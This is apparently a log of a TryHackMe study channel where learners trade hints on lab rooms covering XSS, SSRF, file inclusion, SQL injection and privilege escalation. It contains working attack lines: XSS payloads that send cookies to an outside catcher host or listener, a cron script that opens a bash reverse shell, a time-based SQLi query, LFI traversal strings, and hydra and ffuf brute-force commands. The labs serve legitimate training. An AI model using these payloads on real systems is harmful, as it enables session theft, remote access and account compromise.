#junior-pentester-path

its not showing up at all

Always listening

Nothing happeninh

can i send my payload here?

We only need to edit our IP and port number within right?

|| </textarea><script>fetch('http://aefd9d36a7f158329909e2ab60efc258.log.tryhackme.tech
?cookie=' + btoa(document.cookie) );</script> ||

What can possibly go wrong ? Trying since 1 hour

No need for this one its already there

Im trying using a vpn on my oen machine

sorry i dont get it, how should i restart victime box?

you mean the vm machine

ok

virtual machine

The website machine that you're attacking

read carefully instruction 4

I have tried this as well : " https://website.thm/item/2?server=server.website.thm/flag?&x=id=9"

I did

@steel nymph i restarted it still not working

By suppose you mean expected request ?

is string.printable enough for password guessing ?

please help me

php?

IDOR: Task 2 An IDOR Example. When I click on the emails and check the URLs most are not found in the Attackbox. Is their an issue with task 2

That's what I thought...

Lollll i won a 3 pound voucher

congrats)

gratz

But i can't use it cuz im on a different currency

Hahaha

Thanks guys

i dont think its problem

Yeah but if i wanna buy something its in pounds

the problem is that i dont have other 17 pounds)

Hahaha

Exactly

I only have the SQLI left in that category

does blind sqli password bruteforce works only with cleartext passwords?

no luck. found ||table_name='analytics_referrers'|| and ||table_name!='analytics[]referrers' or 'analytics[^]referrers'|| is there any wildcard to check numbers? and I checked the numbers manually. Also, I think || 'analytics_referrers' || is right, because I got the ||COLUMN_NAME= 'id' and COLUMN_NAME ='domain'; || by using that table_name. how could I find more COLUMN_NAME by using filter. (Can I filter more that one input eg. ||COLUMN_NAME ='domain' 'id';|| @steel nymph

oh, okay!

well, finally, ended the "Jr penetration tester learning path"

Jack, just drink some rum

Congrats man :)

with no interesting prize to redeem, just streekes, and pentest title

ohh, finally
that was interesting, but need rest a lot now)

thanks that person who used digit pin-code as a password)

Hello guys! just a quick question, in the Linux PrivESC, is there any other way to check what python version is installed rather than just executing python? find / -name python* -type f 2>/dev/null gets me a ton of info and not the straight up answer

I already got the answer executing python im just curious if there's another way

https://tenor.com/view/chuckles-im-in-danger-ralph-wiggum-the-simpsons-gif-14149962

I just realized this Learning Path with tickets was a thing today lol

well it definitely lists all the pythons but it doesn't straight get the python 2.7.6 that im looking for when i execute it, anyway it's way clear than executing find / -name python* -f 2>/dev/null

Ty anyway!!! ur always helping here lol

Gave +1 Rep to @steel nymph

Weird question that I'm hoping I'm not missing an obvious answer for.

I'm doing the File Inclusion room at the moment and I'm struggling with task 5 - LFI 2, the first question asks for the request that you use to get up the files, however the answer I've got (using the method they display in the room) just comes back as a wrong answer and trying the other method, doesn't work for me. I'm using the null bite trick and that seems to work but it's the "wrong" answer. Anyone else come across this and able to shed any light? I'll take any guidance I can get on it

python -V

Linux PrivEsc task 6 - 'sorry, you are not allowed to set the following environment variables: LD_PRELOAD'

i cannot find a way around this, any hints please?

Thanks for that, I'll open burp and try that way, what's the worst that can happen

Gave +1 Rep to @steel nymph

ah ok, i had my wires crossed thanks

Gave +1 Rep to @steel nymph

need help on Task5 windows privesc, sc stop dllsvc & sc start dllsvc didn't work

Once I got the hang of it, I actually really liked the Linux Privilege Escalation room

The capstone was quite easy though

yeah im liking it so far, probably my favourite

i think my payload are correct

can i dm you?

didn't fall for that one even it was so obvious lol, ty

Gave +1 Rep to @wispy nimbus

Hey, having issues with the unquoted service path windows exploit. Is the service not starting part of the challenge?

when using sc start service

or net start service

yeah got all questions right so far apart from the last one which requires the exploit to work

hmm ok

system error

file or directory is corrupted

Hello all, In linuxprivesc task 7 when I try : find / -type f -perm -04000 -ls 2>/dev/null I do not see nano => cant add user -> cant access flag. what am I missing?

anyone solved the SSRF room?

|| https://website.thm/item/2?server=api.https://server.website.thm/flag&x=&aid=9 ||

is this wrong for task 2?

hi, is the Jr Penetration Tester path for premium user only, or anyone can access it

need to add a ?url parameter?

For some rooms yes, for some rooms no

I get 404 response

what is wrong with the link

Well, I know it is wrong thanks to the 404 response

Thank you, What would you suggest I start off with if I have no prior experience in cyber security (for context: I am a computer science student)

Gave +1 Rep to @knotty walrus

I can give you a detailed explanation in DM

feel free to DM me

Thank you!

nothing

Oh okay it worked when I refreshed the page

sorry

No response in "Privilege Escalation: Cron Jobs" task

|| https://website.thm/flag/9?server=api ||

what is the issue here?

-sh: 25: ./backup.sh: Permission denied

i swear if i get one more pentester title ticket

haahaha

focus on the knowledge you are getting dude

I also get 1day freeze

i know most of this, it's nice to refresh but i was blitzing in vague hopes of getting dat oscp

also, one short for ejpt, which, meh, but still

as far as I know

the OSCPs are claimed

am i wrong

drat. ah well

https://server.website.thm/flag?id=9 this is the link I need to request right

what should I change at your link

doesnt it needs to be server?

Well I atleast got a £3 Swag Voucher 😄

yeah

It changes the server value

I need some help with SSRF room task 2

@steel nymph thanks I just saw hehe

Gave +1 Rep to @steel nymph

@steel nymph I figured I should inject server into server request somehow. Could I do this in the code?

Or the path hmmmm

Please I need help with linprivesc task 7(SUID) non of the SUID enabled binaries can be taken advantage of
Thanks in advance

@steel nymph I'm pasting the server.website in. But I guess my format is wrong. api /-= (url). Just getting my format wrong I guess

Already checked all on the website and still got nothing

I'll check again thanks

Gave +1 Rep to @steel nymph

Just got the gist😃 thanks

Can someone help me? I’m stuck with the Metasploit exploitation room

getting the meterpreter session

In regards to challenge 1 in LFI, I have tried to || change the request to post in burp and add a file var in the request but got nothing in return.|| also for LFI challenge 3 I have tried || the ....// filter trick and %00 but both don't work.||

i'm not sure how to do that

I'm stuck on "Authentication Bypass" Task 3 Brute forcing with ffuf. I'm not getting a username/password but 0 errors.

I read that earlier. can I pls dm you my request I modified in burp?

Didn't seem to change anything. I'm sure its something minor I'm overlooking too.

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200 I'm actually using the machine IP in the command lol.

Showed me what I saved in the file from the previous task.

there might be an error with the output to the .txt file from the previous task

you might have to manually type the 3 usernames into a .txt file and use that

That was 100% it. Thank you both!

Gave +1 Rep to @marble hamlet

https://website.thm/item/2?server=website.thm/flag?id=9 yeah im so far off on this answer in ssrf task 2

Hello guys, who can briefly explain the difference between PIM( Privileged Identity Management) and PAM(Privileged Access Management)

yeah im missing the secret code.Just my format somehow is incorrect its like i paste it in the wrong place

I would play around a bit with the "website.thm/flag?id=9" in order to see how that changes the server requesting

PIM typically relates to individual accounts, where as PAM relates to groups. that's as much as i can really explain and put in words

Ok, thanks

Gave +1 Rep to @sterile crescent

hey, anyones knows where can i get the hash of the commit in github?

Does anyone have any links on how to make your own server? I am trying to do the RFI playground challenge and I need create a server to upload a file. Thanks!

I'm in LFI challenge 3. Is this on the right track? ||/challenges/chall3.php?file=welcome&../../../../../etc/flag3||

sudo python -m http.server 80

That will serve the directory that your in

Oh thanks CheckN8

good to know

You can use any of these.

python3 -m http.server 8080
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000```

thank you!

Gave +1 Rep to @near vapor

For the Practical XSS: Am I supposed to wait a few minutes after submitting a ticket with the payload? Or am I supposed to open the ticket myself? I get the cookie if I select the ticket, but it says it's incorrect after cracking it. I've tried both cracked and un-cracked cookie value

any luck with solving this task? I'm stuck on this task as well

I have found 2 options but can't make any more progress.

It usually should not take that long, but yes you have to wait. If you are opening that ticket yourself, you will only get the session cookie of your own session instead of the staff session.

In case nothing is happening, a restart of the target machine might help.

That's what I figured. After the first couple of times I thought "Well, it's 'my' session cookie which probably doesn't mean much since I'm not admin" so I thought maybe there's a script that checks the ticket as staff. Unfortunately I've been waiting for about 10 minutes, still nothing.

https://website.thm/item/2?server=website.thm/flag?id=9 i added the secret code to this but not getting it. It must be so simple im blind

For the RFI playground is my code ||<?php echo gethostname() ?>|| correct?

I used something different.

you're very close

use a ||php|| specific function.

okay I will give it a try need to look it up

Very close but yet so far

like how I am with that Blind-SQL task; Task8. the only one I'm missing

have you completed challenge 3 by any chance?

can you maybe give me a hint where to paste the missing stuffs

Yes I have I need to remeber how I did it though lol

i know its &

If you remember pls drop me a hint. Struggling to figure it out.

you're missing something between ||=website|| and something after|| 9||

What do you have right now?

@deep pike
I noticed that the url doesn't accept /. I did this ||/challenges/chall3.php?file=welcome&?file=/etc/flag3||

think back to how they handle subdomains for SSRF

like https://website.thm/item/2?server(x)=website.thm/flag?id=9(x)

not quite

but the right spots?

I can tell you ||there is no (x) after ?server||

and no ()

it blurs out

I would check ||the request method, something is filtered||

hmmm so its the right place.....its just i have to do &x=

yep,|| just not after ?server|| you're also missing something between ||=webserver|| pretty sure

Wasn't that challenge 1?

||it is similar but not the same||

https://website.thm/item/2?server=website.thm/flag?id=9 can i maybe get a hint of where.im struggling for 3 hours on this one.im so confused

Can anyone give me nudge on the second question in Privilege Escalation: SUID. Its asking for user2's password and I nabbed the shadow and passwd files and ran them through john with no luck for the user I need

||You're missing the subdomain name between "=" and "webserver" so it's supposed to be server=name.webserver.thm/flag?id=9 and you just need to tack on the &x= at the end||

@near vapor hi man can you give my a idea what this task ask for Which function is causing the directory traversal in Lab #4? cant figure what to put there

@modest arch
Take a look at Task 3.

you have no idea how much it took to reallize what was asking task 3

i have just that one and cant figure what it is

If you have the answer for Task 3 you should be able to answer Task 5's question about lab 4.

cant figure what word is so long

Anyone finished with Linux PrivEsc?

re-read the question and then refer to task3.

I figured out, but still dont understand it.

im not sure if you are using a tool or the browser tools. I used the browser itself and messed around to get the right ||request method and loading the page in another tab||

got it.

with the playground flag I am still getting errors and unsure as to why.

I have a server at 0.0.0.0:8080 and am getting my ||rfi.txt which first had <?php echo gethostname(); ?> that didnt work so I tried echo php_uname('n');||

and im getting an error that says couldn't connect to server. I also tried to connect in a sperate tab and that worked.

how do i use the tryhackme request catcher?

Stuck on File Inclusion Task 4

Not sure how to input what is being discussed

i'm also stuck on it

Do we add directly to url or the seach bar provided

well

Lab 2 right?

have you tried adding what's been told to the url?

Yeah but it doesn't seem to work

I tried the ../../../../etc/passwd

Were u able to solve lab 1?

i wasn't

I got the answer but i dont think the server gave me the response i was supposed to get

@chrome sand think full path.

Hmm full path through the url? @bleak pilot

on the active reconnaissance room, task 5, it keeps saying that my connection has been closed

is this your Question that you are working on:

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

i believe he's talking about lab 2

Second question

For Lab 2

Yeha

What is the directory specified in the include function

But even for lab 1 i got the answer but wasn't able to read the etc/passwd file

/etc/passwd

For lab 1 in the URL i had

Give me a couple of minutes. Was elsewhere. I'll fire it up.

Ip/lab1.php?file=/etc/passwd

No worries, thanks!

http or https?

https://website.thm/item/2?server=api.webserver.thm/flag?id-9(&x=) can someone help me this is the closest ive gotton to ssrf

Http

I got the answer

@earnest shell Read the top of the page for the server you want to query.

It's includes

Got it from the error messages

Lol

But still not able to read the files the labs are meant for

Good job @chrome sand

as in ssrfqi

Thanks for helping out

Gave +1 Rep to @bleak pilot

still stuck on lab #2

@earnest shell what task are you in?

im in ssrf task 2

i feel like im on 99.9.....but im not seeing the server lol

Too bad they have extra databases in there. Wild goose chase and you have to start over again. Hours gone. Why did they have to put an extra database that could be discovered on the SQLi module?

nvm i found it out

welldone

@earnest shell so on the final page of instructions, pay close attention to the server that has the flag.

Good job @copper garnet

Nice job bud
Honestly this this stuff is just about trying harder

thanks

https://website.thm/item/2?server=api.webserver.thm/flag&x=id-9 hmmmmm

Discord has been a really good resource for me as well as reddit

oh wait i see question marks

@earnest shell The format of your original line was really close other than the (). And read the server name they say the flack is on. You are SO close.

This is what you originally posted: https://website.thm/item/2?server=api.webserver.thm/flag?id-9(&x=)

https://website.thm/item/2?server=api.website.thm/flag?id-9&x=

im soooo close lol

your ? isn't the correct thing nor is the second server name

You are VERY close!

Sorry. Forget about the ? statement. Been a long day. your ? marks are all good.

Read the description of the server holding the flag.

https://website.thm/item/2?server=server.website.thm/flag?id-9&x= 😆 lol

what the heck pretty funny that i dont see it

Are you in the split screen window?

i am

See if you can left-click and hold while dragging from underneath the url line to the Server Requesting at the bottom.

No, sorry again a long day. look at your id in the line you posted.

character right after it.

https://website.thm/item/2?server=https://server.website.thm/flag&id=9&x=

Nope. original character before the id was correct.

https://website.thm/item/2?server=server.website.thm/flag?id=9&x=

im like one char off lol

Ive got good news....

That actually looks correct.

it was the =

only took 6 hours

I apologize for the sideways path.

thanks so much!!!! that one killed me but still going

now you can sleep.I owe you my life

Good job. and good luck.

You owe me nothing. Helping one another out makes our industry stronger.

Having some trouble with Task 5 if the LFI room, i was able to execute the exploit, but the question is what function is causing the directory traversal in lab #4?

I have tried nullbyte as well as current directory but none of them seem to be it

Read the error message

It's not asking for anything you input.

It's asking for the php function that allows directory traversal to happem

Happen

You're beautiful

Got it

Thanks! @drifting drum

Gave +1 Rep to @drifting drum

got that one is something else read task 3.

I was able to get to the file in the first try on this one so didn't see the error messages

I added some fuzz now and was able to see it

Ah yea. Even if you can get the file, it's always good to check errors so you know what's hapoening

Makes sense!

Hey all I’m having an issue in Auth. Bypass Task 4 getting the Curl req #1 and #2 to properly change the users password reset link to attacker@hacker.com. I’ve reset my machine and attack box 5 times thinking there may be an error. I copy the curl verbatim, but the website continues to show the original email address. Any one else have this issue?

hello guys
i need help with SSRF jr pentest task 5
does any one know or have done this?

hello guys
i need some nudge, File Inclusion VM - Task 8 flag2?

@open hornet he got the flag on that question. 🚩Welldone

Hi. Is there any other way to access the windows machine on Windows PrivEsc? Other than using the attackbox. Im trying to find a way to acces using my own kali machine

Xfreerdp

Its asking domain and pw. Is there any scanning i need to do?

which task is that also some of the task in win privesc gave user and pass that would be enough to connect with rdp or evilwinrm

Task 2

It doesnt state how to connect or any scanning etc. I tried some google and saw the guy use the attack box

i think you cant use rdp for that since it does not provide any creds nor do i know if theyre rdp connection is open

just use attackbox for that but for task 5 and 6 you can rdp

Ok then. So i assume theres no way to connect to them untill task 5 6

Thanks

Room cross sight scripting task 8. What ip do I have to add into the path that gets pasted into the ticket. #help

And the port number

Your Listener's IP and Port or you can use the THM's Request catcher (10.10.10.100).

@balmy mantle what a boss thankyou
https://media.tenor.com/images/ac160e60bac623635384605dc5cf9ec1/tenor.gif

@balmy mantle just waiting for the cookie🍞

It shouldn't take long to appear in the Request catcher.

It gave me a THM..... But nothing in the catcher... Hmmm

I need some help on Linux PrivEsc $PATH (Task 10)?

@balmy mantle dmed you

Where are you stuck ?

@balmy mantle Thanks for the hints got the flag 🚩

Gave +1 Rep to @balmy mantle

can anyone tell me if I am looking at the correct exploit?

no replies : )

Everyone here is a volunteer. You need to be patient.
Can you explain to me why you think it's that exploit? I can check your process but I haven't completed the room

I found the CVE after searching the vulnerable application name with version

But the script has many errors

Ik it has errors so was checking if it still has issues

@modest arch Could you please provide content of the script ?

You're running it with python 3

It's written for python 2

raw_input and print as a keyword rather than a function, those are python 2 things.

lesson learned for skipping python2 🙂

You should be able to tell from the shebang at the start.
This is one of many reasons that it's critical to actually read the exploit even just at a high level.

The other reason is so that you don't break stuff.
There was famously a fake SSH RCE exploit that would wipe your attacking system.

It's a big thing that OSCP/PWK tries to get stuck in your brain. Reading and understanding and fixing exploits

That's what I thought

You should also change 3 lines in this script

So useful things to note from reading that, it expects a proxy on 127.0.0.1:8080

Url
Comment proxy line
Remove proxy mention from "r ="

You can start burp if you want that, or modify it to not use the proxy

And change the print back to remove the brackets

Picture found on THM forum

It's important to know why you're doing that too though

Indeed

If I keep the proxy as in this pic and start burp will the request be captured in burp?

Yep.

It'll even be intercepted if you have intercept on

Can I PM you

Sure

Simple sad story. I finished the path. Collected all tickets. Vouchers completed are literally free stuff. Title and streak freeze.. 🤣 others just stuck at 2 tickets..

yesterday I completed like 10rooms and only got the title 1day straek freeze tickets which really sucks

File Inclusion Task 8 - Challenge 2. Does anyone have a clue what to do after I've ||changed the cookie||? I see an error now, but cant figure out how to get around this one.

What's the error? Does it look anything like what you did to your cookie ?

Looks like it has accepted me as admin, but that I'm not complete with the lab just yet 🙂

It says:
||Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37

Warning: include() [function.include]: Failed opening 'includes/Admin.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php' ) in /var/www/html/chall2.php on line 37||

Play with the cookie some more and keep an eye on the error message

Thanks! ||My cookie was named Admin with a capital A.. it didnt like that 🙂 ||

Gave +1 Rep to @dull turtle

https://tryhackme.com/room/nmap04 task 3 not getting an OS with "sudo nmap -sS -O --traceroute machine IP"

get 1 hop, the TCP/IP fingerprint, no exact OS matches

Remove the --traceroute and see if that helps

Can't seem to get Content Discovery on the VM to work

the content discovery didn't say you needed to be on the VPN?

Gave +1 Rep to @steel nymph

@steel nymph Thanks for letting my know about the VPN ... the room designers need to really include a sign post as part of a clear precise instructions.

Gave +1 Rep to @steel nymph

Hello. Can someone tell me about the Windows Privesc room in JR pentester? Task 2. How do I get into the deployed machine ? There are no credentials anywhere...

Oh, thank you so much. So much time, it would have been possible for the THM team to fix it.

Gave +1 Rep to @steel nymph

I have enabled foxyproxy and put intercept on at proxy tab but the browser isn't hanging? i can see i receive data on the other tabs but cannot choose 2 forward or drop the intercept. Is there a setting i need 2 check?

thanks @steel nymph

Gave +1 Rep to @steel nymph

Still stuck on File inclusion Task 8 - Challenge 2.
Changed the ||cookie to value admin and got the admin page. But cant figure out how to get to the flag.||
Any tips?

thanks - ill try playing around more 🙂

Gave +1 Rep to @steel nymph

how do I connect to the windows machine for windows privesc

is it rdp?

oh

thanks

Anyone done with File Inclusion room?
tryhackme.com/room/fileinc

Hello!
Since the number of prizes is limited, is it still worth to try getting tickets? I mean, all limited prizes are claimed by now aren't they?

I think someone yesterday said the claims were not updated. But afaik its last day today

Actually they extended the event to 31/10 and added prizes

Oh 🙂 Nice to know.

But yeah, they do not update the claims, which is not a good thing for my school projects xD

Why did I just get kicked from the RDP connection

Now I can't connect

I restarted the machine

Now it works

Odd

Aaand disconnected again..

Are you using xfreerdp?

no

just rdp

Maybe try remmina if it's working.

try what

I mean I just said it, remmina ^^?

why doesn't remote desktop connection work

also what

that's only for linux

Maybe it does and there is another issue, but it's worth to try.

i don't know how you expect me to install a linux app on windows but ok

Oh I thought you are on linux, my bad.

I just sent this image ...

So you want to argue now because I tried to help you? ..

no

what

Hi! I stucked on question (File Inclusion) "Give Lab #3 a try to read /etc/passwd. What is the request look like? ". But I get this and can't figure answer? Why "/lab3.php?file=include("../../../../../../etc/passwd%00").".php");" is not correct?

Ok, I got this. I counted the number of * and edited payload xD

I'm completing nmap post port scans room and it has a question What does the script http-robots.txt check for I ran the script I got open ports and services but I'm not able to figure out the answer

@analog quartz you can also cat that scrip and it describes it in the description.

okayy

i did use a http portscan module but it says this is not a wordpress site

what can i do now : (

got it thanks

Gave +1 Rep to @steel nymph

||https://website.thm/analytics?referrer= referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name='users' and column_name like 'username';--||

What now? Time Based, Blind SQLi.

Any help would be appreciated.

ik so what should I do now there are too maaany http modules

That's the part i didn't really understood :d

Yeah, I guess that's what we need to pass the level.

give me the filter word please : (

xD I was doing it correctly

just typed the wrong password

lmao

still wrong module @steel nymph

?

or can anyone else tell me what's wrong

I'm not able to ping the windows privesc machine attached with the task even after connecting with the VPN. Any suggestions?

Is something not right?

thanks AA lot @steel nymph

Gave +1 Rep to @steel nymph

I really would have missed that

Thank you mate got it

Gave +1 Rep to @steel nymph

hey, i have issues with the freaking Burp and i don't know what I am doing wrong..(burp: Intruder Task 10,11)
For some reasons, when using Intruder and start the attack - all of the results have same status and length value... I had to manually try 100 acc + pass to get to the right one.

@steel nymph on file inclusion task 2 I've changed the cookies and I have been looking at the errors I get in the response window but I can't seem to get the correct file path to reveal the flag. Any tips or suggestions?

how do you use spoiler?

I've done || http://MACHIN_IP/challenges/chall2.php?file=../../../../etc/flag2||, Also || http://MACHINE_IP/challenges/chall2/etc/flag2|| and other iterations of those.

also I dont have a cookies tab in my developer console and I cant seem to find it?

ok thank you Ill look around

@steel nymph This is what I got

play around with that cookie and see what message u get

@steel nymph || I've changed the path to /etc/flag2 and it just loads another cookie window in Guest again ||

Combine your answers

Ive been getting those too earlier. But now i already know.

U need to input invalid credentials, and than intercept those request.

U cant put the username and password payload manually in the position tab.

U need to intercept those invalid creds request, then the the username and password payload will spawn in the coding by itself. Now that will work.

You need to unshadow the file first

You need a copy of both the etc/passwd file and the /etc/shadow file. Then use

unshadow passwd.txt shadow.txt > unshadow.txt

Then crack the unshadowed file

There's likely more than one password in there and there's a good chance the root passwd isn't crackable. You only need the hash for user 2

Hello I'm doing the Vulnerabilities 101 Room. is NVD and exploit-db down for anyone else?

nope works for me

does crontab work every 6 mins in linux privesc?

1 I thought

anyway i waited more and didnt get my shell(

neither python nor bash didnt work

hey where is the "flagUSP.txt" in Windows Privesc Unquoted Service Path? Can't seem to find it

Weird. I'm having DNS problems with nvd and exploit-db. Maybe my ISP has a problem looking at those sites. haha

RISE AGAINST SUPPRESSION OF 1337 H4CK0RS!!!

lmao what

in one of the user folders

nvm found it

I upgraded to meterpreter and search cause why not

thanks

Gave +1 Rep to @lusty bolt

I'm pretty confident that I could have broken into the server room and taken the servers by now vs getting flags from task 8 in the File Inclusion room

@waxen mantle same ive been stuck on task 2 all day 😦

I don't see how tasks 1-7 supplement task 8 challenges

you mean challenge 2 of task 8?

or just launching the vm? lol

@waxen mantle yes task 8 challenge 2 lol

yeah. took me a while too

I got challenge 2 and yet 1 and 3 evade me

I'm stuck here

||user admin as lower case||

So try to play around with that cookie value to see how the site behaves, especially the include warning part.

You changed the cookie to the correct value. Now add more to it

i still don't understand how the error text works of how it is supposed to point you in the right direction

Hi, can you help me for ssrf room, I don’t understand how it work?(view site)

Well right now it's trying to include the file Admin.php while at the same time forcing it to open that file in the includes folder. That's why it says failed to open "includes/Admin.php"

||research about verb tampering and null bytes then you can get flag ||

don't get how to privesc using path
if file created by me have same permissions as me

@full escarp ok will do thanks

Gave +1 Rep to @full escarp

theres also set of payloads you can try, check payloadofallthings in github

Payloads all the things

I get this in the dll hijack in windows privesc. what to do?

you have to make a program with suid or sudo call it

like in example ?

have you tried with the gui? services.msc

nope. will do

yes. so make a file named thm. that program will execute it.

maybe i did something wrong
but when i run test nothing happened
neither error, nor result

I'm not getting reverse shell in linux privesc task 9 cron jobs

did you make the thm file executable?

check commands without cron

hmmm, maybe no

Do any one know Nmap host discovery using tcp and udp in Nmap live host discovery

Hello guys, I am trying to do the room "Protocols and Servers 2" and I am stuck at the task 6. I executed this command :

hydra -t 64 -l lazie -P /usr/share/wordlists/rockyou.txt 10.10.64.86 imap

But after few hours I still don't have any result, is there somebody who can help me to find what I am doing wrong please ?

it should only take seconds

I know, this is why I am asking 😭

I am stuck at which tcp ping scan does not require a privileged account

Can't do anything

give me a sec

Yep, thank you 🙂

Gave +1 Rep to @wraith ice

try to reboot the machine

you can add -v to get more details on what is going on iirc

this is the 3rd reboot that I tried

@wraith ice attack box or your own box?

btw, you can't connect directly as a different user from the browser right?

? I rebooted the target vm. didn't work

I dont' think so, you can rdp though

oh wait. task manager can't stop it. but it restarted it

cheers

I am doing Nmap live host discovery and stuck at task 7

👍

I know but it doesn't help so much, it alternates between errors "service shutdown" and failure with a new password

you just need to read the page, it explains what privleges are needed for each type of scan

@modest arch what are you stuck on?

How to answer

The answer format

For which question? There are three.

First one

correct IP ? you can also diminish the number of threads to 16 for ex instead of 64

@noble dust gave answer in like 10 secs

Last 2 tickets 😥 . This is all I got for 50 tickets.

@modest arch They only talk about two TCP type scans and each is explained in their respective paragraph.

Same here 😦

yeah. and make sure you are connected to the vpn and there is only 1 tun interface

command is working without cron

but not with cron

in what file is ur command?

backup.sh

hmm
ok, idk then, sorry
i had some typos so it wasnt working

@bleak pilot i don't understand the answer format

can i have a hint for file inclusion task 8 challenge 2 flag 2

i currently have burp up and see the file format but im struggling turning the file path into a request and get the fille\

@modest arch Tis is the question that I think you re talking about: Which TCP ping scan does not require a privileged account?

file

Is this correct?

check the titles of paragraphs. that's the format

cookies are yummy

Ya

okay

Yes

make sure you did chmod 777 backup.sh

Yes correct IP, I also tried with 16 threads and without the option -t

😭 😭
I use the exact same command !

send screenshot of output?

With the right IP of course

@modest arch I guess I don't understand the confusion then.

connected to vpn? Are you using your own machine or attackbox?

same. lmao. rtfm right?

I'm working on Local File Inclusion and have no idea what is being asked of me in Task 4, Lab Lab #2

In Lab #2, what is the directory specified in the include function?

Yep, let me few seconds
I relaunched the bruteforce without the option -d few minutes ago

Yes of course, and I tried both

did you try terminating and restarting the vm you are attacking?

I think I am not allowed to past screenshots here, is it possible ?

Yes, this is why I relaunched the command

yeah of course. I mean I just did...

you can dm me if you are not comfortable posting here

It's not the problem, I tried the copy/past and the drag and drop but Discord doesn't react.. when something don't work nothing work ahah

still not working

check the error message

save ss and upload with + sign

Thanks. Cheers

Gave +1 Rep to @wraith ice

Sitting in front of my face the entire time -.-

someone please help in cronjobs

task 9 linux privesc

will check again. give me a min

okay im in the repeater trying a numerous different variations of this cookie, am i on the right track? Cookie: THM=admin; file=..%2f..%2f..%2fetc%2fflag2

I edited backup.sh

you can ditch the admin part now iirc. also no need to URL encode

iirc? sorry im new

if I recall correctly.

@steel nymph is this the right file?

I'm not able to run it as karen

if i send file only not encoded it says "refresh" @wraith ice

not in sudoers

think a bit more...

@steel nymph Umm. I am also confused about what you are saying...

nah. I am done

k

I'm able to get normal reverse shell but not the root one

same as what is given on thm

./backup.sh

Alright, more issues on PHP. Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

DO NOT EXECUTE THE SCRIPT. Let cron do it's thing. That's like the whole point of cron

cron doesn't seem to be doing its thing

Wait 1 min. It should run every minute

I've waited much more than 1 min

it doesn't work

what is output of cat backup.sh? What's in there?

If it doesn't call back to you, try to use the local nc binary to get a revshell to localhost (127.0.0.1)

#!/bin/bash

bash -i >& /dev/tcp/<HOST>/6666 0>&1

I'm able to get reverse shell but not as root

terminate and restart the machine. might fix if something broke

oh wait

I got the root shell

damn

lol. congratz. sometimes you gotta be patient...

🙂

Need help with -
Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

Unable to get the version ID

oops

Access Denied! allowed files at THM-profile folder only!

I just don't understand this at all - literally my brain isn't able to comprehend it -.-

This is my first room today =[

Definitely, taking a step back has solved a lot for me

"Once your friend reaches 500 points, email us with your TryHackMe username and we will award you and your friend 2 extra tickets"

Where i need to write about referral

nfs not giving root shell

Did anyone got the challenge 2 of file inclusion ?

Tried almost all the combination couldnt get any error

no, noone)

Hello, could anyone tell me where is that flagUSP.txt file on the last win Privesc Challenge ? lol

hi, i am at the cross site scripting. For the blind XSS, i first tried to write the payload by myself, sending the cookies on a http.server started with Python. I didnt receive anything so i tried with a nc handler, which didnt work either.

i'm looking around for 1h

anyone?

To check if it was my payload that wasnt working, i copied pasted the given payload ( and did specify my port )

but it still isnt working

Task 8?

Anyone able to assist with File Inclusion - Task 8 - Flag3. I've tried for the last two days and not sure what I'm doing wrong. The closest I've come is with getting character encoded output and an (include) directory that doesn't seem to help.

Yes

||did you change the cookie?||

For 8:2 look at the hint.

finally, i used the tryhackme requests handler, got my url and everything, by nothing showed up. Does anyone achieved this challenge and can hint me around what im doing wrong ?

Yes got to admin page but what after that ?

also currently stuck on this

ok, already done so 3 times already

@steel nymph

||try changing the cookie to something else now...||

i even used dns to get the cookie

tried to concatenate it to my domain, not working either

yes i do

which btw isnt a valid base64

Ohh is it . Okay i will play around with that.Thanks @mellow flume

created that nfs exectuable after mounting one of the folders and set the suid bit and executed it but it's giving normal shell

oh F

ubuntu

ok thanks, gonna restart a little more

Hello @steel nymph

did you finished the WinPrivesc Task6 ?

btw, while i was checking if my payload was faulty or not, i tried a few fetch in the debugger, fetch that mozilla didnt like at all, responding with some "mixed content warning"

i read the mozilla page on it halfway

any hint where to find this damn flag txt file ?

yes

does a payload like

<img src="oi" onerror="document.location.href = 'http://' + btoa(document.cookie).replaceAll('=', '') + 'f79d0a17b78d347b4a0e47deeeb7b1e7.log.tryhackme.tech';">

would circumvate this protection ?

yeah, i just tried this since it wasnt working

but yeah just gonna restart and go with the given one, a bit tired of this room

I'm having a tough time with the 4th flag in task 8 for rfi

What I have tried so far is making my own server with python3 -m http.server 8080, next I made a text file that has ||<?php echo gethostname(); ?>||

I put that into the url with ?file=0.0.0.0:8080/rfi.txt

and get an error of couldnt connect to server

o

facepalm

so I can just use my machines ip?

thank you I will give that a try

XSS room, last challenge:
I am connected to vpn (tun0) and have netcat running on 9001
now i should receive a cookie to this terminal with this request, right?
</textarea><script>fetch('http://10.8.193.69:9001?cookie=' + btoa(document.cookie) );</script>

yeah, but when i did it in the thm Attack box, it works ?

i don't get anything ..

ah okay

Like lassi said, try to open that ticket, if you get your own session cookie you did everything fine and you only have to restart the machine.

hmm, didn't get my own cookie

but i should put my vpn ip ?

unter the tab "access"

and:
nc -nlvp 9001

so strange

alright thanks

@steel nymph thank you so much! I feel so dumb lol

Gave +1 Rep to @steel nymph

I don't think it matters, but maybe create a new ticket without the forward slash after the port number, I think that shouldn't matter, but worth a try.

@shadow echo @steel nymph thank you

Gave +1 Rep to @shadow echo

@steel nymph thank you

+rep @steel nymph

Gave +1 Rep to @steel nymph

I do it for you Junior 🙂

Gave +1 Rep to @shadow echo

alright that doesn't work as well 😅

Can you try curl 10.10.10.10/whoami in your machine?

yuo, curl works

@steel nymph that could be yes, i had to switch from VIP to regular server bc vip didn't work

Has anyone else run into this?

well, i already completed it and it works, but thanks anyway gus

I'm typing the code in as it says in the task or atleast I believe that I am?

Hey guys quick question, I don't know if I should take this path or Pentest+ path. Begginer in sec, just completed pre security path

@zenith edge you should have "$" or "#" in your bash on the start of your line

